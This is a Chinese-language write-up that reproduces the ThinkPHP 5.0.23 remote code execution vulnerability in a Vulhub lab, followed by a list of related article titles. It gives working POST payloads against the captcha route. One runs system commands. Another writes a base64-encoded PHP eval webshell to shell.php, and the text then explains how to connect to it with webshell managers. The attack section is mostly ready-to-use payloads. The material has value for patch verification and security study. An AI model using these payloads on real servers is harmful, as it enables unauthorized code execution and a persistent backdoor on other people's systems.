ThinkPHP 5.0.23 远程代码执行 漏洞复现

  • 一、漏洞描述
  • 二、漏洞影响
  • 三、漏洞复现
    • 1、 环境搭建
    • 2、 漏洞复现
  • 四、漏洞POC
  • 五、参考链接
  • 六、利用工具

一、漏洞描述

ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。

二、漏洞影响

ThinkPHP <= 5.0.24

三、漏洞复现

1、 环境搭建

使用 Vulhub 在服务器上搭建:

cd /vulhub/thinkphp/5.0.23-rce
docker-compose up -d

访问127.0.0.1:8080,进入到主页面:

2、 漏洞复现

第一步:判断是否存在漏洞:
访问/index.php?s=captcha页面,会出现如下报错:

使用 Google Chrome 的 HackBar 插件发送 POST 请求:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

得到回显:

whoami 命令成功执行。

第二步:漏洞利用
通过echo命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码:

发送 POST 请求:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php

访问shell.php:

可以发现一句话木马已经被解析,使用蚁剑、菜刀等 Webshell 管理工具连接:

四、漏洞POC

测试路径:

index.php?s=captcha

POST 传餐:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

五、参考链接

https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
https://www.dazhuanlan.com/2019/12/05/5de818364c3ac/

六、利用工具

TPscan

ThinkPHP 5.0.23 远程代码执行 漏洞复现相关推荐

  1. thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞

     漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...

  2. php post 漏洞_ThinkPHP5 5.0.23 远程代码执行漏洞

    作者介绍:Ice 国科学院安全学员,在国科学习安全课程,也参与在国科学生会安全团队中进行安全实战能力的提升.本次分享主要是针对现在一款运用极广的开发框架ThinkPHP的远程代码执行漏洞研究,希望给大 ...

  3. IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

    CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...

  4. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  5. Office 远程代码执行漏洞复现过程

    本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...

  6. Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御

    摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...

  7. 用友NC BeanShell远程代码执行漏洞复现

    用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...

  8. cve-2017-12617 tomcat远程代码执行漏洞复现测试

    0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操 ...

  9. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

最新文章

  1. ISME:长期进化实验揭示脱硫弧菌的硝酸盐耐受机制
  2. 关于collect2: cannot find ld的解决办法
  3. 反向传播算法_反向传播算法:定义,概念,可视化
  4. Linux里的21究竟是什么
  5. WPF 依赖属性详解【转】
  6. 情人节,怎么同时约会女神和女朋友
  7. 升级到android studio 4.1后检测不到flutter、Dart插件
  8. [JAVA]字符串单词倒转处理前面的空格
  9. 拓端tecdat|R语言状态空间模型:卡尔曼滤波器KFAS建模时间序列
  10. 苹果雪豹操作系统正式版_如何不花一分钱用上iPhone11?更新iOS13正式版吧
  11. 含辞未吐,声若幽兰,史上最强免费人工智能AI语音合成TTS服务微软Azure(Python3.10接入)
  12. 今日早报 每日精选12条新闻简报 每天一分钟 知晓天下事 6月29日
  13. sdk 今日头条_今日头条商业SDK(激励视频)的坑
  14. linux网络协议栈ip_rcv
  15. Error while building/deploying project QTtest (kit: Desktop Qt 5.9.0 MinGW 32bit)When executing~
  16. char与varchar的区别?
  17. java中的instance_Java基础之Class类与instance关键字
  18. 剖析“Flash助手新鲜事 头条”弹窗小广告——Adobe竟和中国广告商同流合污!
  19. 深度分析 Java 的枚举类型:枚举的线程安全性及序列化问题
  20. ic芯片写卡软件的分类

热门文章

  1. 什么是环境变量?道理在这四个故事中
  2. mydate97picker
  3. 【高德地图API】汇润做爱地图技术大揭秘
  4. 为什么零信任网络的设计需求有优先级列表?
  5. WinForm,可能是Windows上手最快的图形框架了
  6. when的多条件查询
  7. NLP领域论文笔记【研一下研二上】01
  8. 声网电话面试的总结,技术面, 声网20min(c/c++算法工程化类职位) (一面通过拿到实习offer)
  9. android pixel 2,谷歌 Pixel 2 评测:目前最好的安卓手机
  10. 7个流行的强化学习算法及代码实现